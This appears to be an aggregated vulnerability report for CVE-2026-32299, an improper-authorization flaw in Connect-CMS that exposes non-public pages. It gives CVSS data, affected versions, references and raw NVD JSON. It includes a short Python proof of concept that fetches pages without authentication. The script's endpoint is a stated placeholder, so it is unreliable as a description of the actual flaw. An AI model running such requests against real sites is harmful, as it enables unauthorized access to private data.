Security Vulnerability Report
CVE-2026-32299 CVSS 7.5 HIGH

Published: 2026-03-23 22:16:28
Last Modified: 2026-03-24 20:38:17

Description

Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, an improper authorization issue in the page content retrieval feature may allow retrieval of non-public information. Versions 1.41.1 and 2.41.1 contain a patch.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:* - VULNERABLE (Connect-CMS 1.x <= 1.41.0)
cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:* - VULNERABLE (Connect-CMS 2.x <= 2.41.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (Replace with the actual vulnerable endpoint)
target_url = "http://target-cms.com/api/pages/view/{page_id}"

# Simulation of exploiting improper authorization to access a private page
# In the vulnerable version, authentication is not required (PR:N)
page_id = 1  # Example ID of a non-public page

try:
    # Sending request without authentication headers
    response = requests.get(target_url.format(page_id=page_id))
    if response.status_code == 200:
        print("[+] Vulnerability Confirmed: Successfully retrieved non-public content.")
        print("Response Snippet:", response.text[:200])
    else:
        print("[-] Exploit failed or content not accessible.")
except Exception as e:
    print(f"[!] Error occurred: {e}")

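References

https://github.com/opensource-workshop/connect-cms/releases/tag/v1.41.1 (Release Notes)
https://github.com/opensource-workshop/connect-cms/releases/tag/v2.41.1 (Release Notes)
https://github.com/opensource-workshop/connect-cms/security/advisories/GHSA-62ch-j6x7-722j (Vendor Advisory)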

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32299", "sourceIdentifier": "[email protected]", "published": "2026-03-23T22:16:27.780", "lastModified": "2026-03-24T20:38:16.723", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, an improper authorization issue in the page content retrieval feature may allow retrieval of non-public information. Versions 1.41.1 and 2.41.1 contain a patch."}, {"lang": "es", "value": "Connect-CMS es un sistema de gestión de contenido. En versiones de la serie 1.x hasta e incluyendo 1.41.0 y versiones de la serie 2.x hasta e incluyendo 2.41.0, un problema de autorización impropia en la función de recuperación de contenido de página puede permitir la recuperación de información no pública. Las versiones 1.41.1 y 2.41.1 contienen un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.41.1", "matchCriteriaId": "60B8BBDF-82BD-486D-AE17-7F59360E62C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", 
"versionEndExcluding": "2.41.1", "matchCriteriaId": "0C11B4F0-DF29-473A-A285-9DA152DDCDE1"}]}]}], "references": [{"url": "https://github.com/opensource-workshop/connect-cms/releases/tag/v1.41.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opensource-workshop/connect-cms/releases/tag/v2.41.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opensource-workshop/connect-cms/security/advisories/GHSA-62ch-j6x7-722j", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}